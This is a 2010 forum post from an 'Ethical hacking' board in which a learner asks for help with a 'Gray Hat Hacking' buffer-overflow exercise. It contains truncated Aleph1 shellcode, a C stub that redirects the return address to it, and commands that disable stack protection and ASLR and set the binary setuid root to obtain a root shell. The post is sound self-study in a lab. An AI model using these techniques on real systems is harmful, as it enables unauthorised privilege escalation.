shellcode question

Discussion in 'Ethical hacking' started by jacksmash, Feb 22, 2010.

  1. jacksmash

    jacksmash New Member

    Feb 22, 2010
    Likes Received:
    Trophy Points:

    I recently bought a book called "Gray Hat Hacking." I've been able to get through the first 150 pages or so with no problem, but there is an exercise I'm having a bit of a tough time with. It seems that it should be pretty simple, so I thought I'd post what I'm doing and see if anyone has any insight.

    First of all, the goal is to use a buffer overflow to obtain a root shell prompt.

    The code is quite simple. I'll post it here:
    char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31
    int main ()
      int *ret;
      ret = (int *)&ret + 2;
      (*ret) = (int)shellcode;
    The point is to increment the return pointer to point to the saved return value on the stack. But there are a couple of tricks:

    1. you have to run gcc with -fno-stack-protector since newer versions of gcc protect against stack smashing.

    2. Recent linux build use ASLR to randomize stack memory calls, and so on my Ubuntu box it is important to first run the following command:

    #echo "0" > /proc/sys/kernel/randomize_va_space
    Now, when I compile the code above, and then run it, I get a segmentation fault. I've noticed that if I increment the return pointer by something other than "2", that I no longer get the fault, but I still do not get a root shell. In case you want to try it yourself, here are the steps:

    # // do the following as root:
    # gcc -fno-stack-protector shellcode.c
    # chmod u+s a.out
    # su <user_with_normal_privileges>
    $ ./a.out
    # // should have a root shell at this point
    Please note that the c-code is Aleph1's shellcode, so I'm not copying something from the book that isn't already online.

    If you have any insights that would be helpful for me to consider, I would be most grateful!!



Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice